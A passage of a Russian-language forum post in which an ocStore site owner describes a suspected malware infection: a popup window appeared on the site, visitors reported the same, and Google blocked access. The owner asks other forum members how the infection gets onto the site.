старого сайта нечего не надо брать. По этому написал разработчику моего шаблона что-бы Он мне выслал чистенький шаблончик. Прошу заметить все дополнения и шаблоны Я использую платные и только с этого форума. Прошло примерно 5 дней. Я рылся на сайте и настраивал Filter Pro Mega и тут мне выдает такое окной, и люди мне начали говорить что у них такое-же..... \ Потом гугл вообще напрочь заблокировал доступ...... Так в чем вопрос я совершенно не могу понять в чем дело? Как это туда попадает....... Сейчас я купил новый хостинг и буду пробовать делать все тоже самое только уже с новой версией ocStore-1.5.5.1.1. Ну что-же удачи мне :) Я бы хотел бы услышать Ваши соображения по этому поводу. Буду рад.
- 5 відповідей
-
- вредоносное по
- вирусы
-
(і ще %d)
Теги: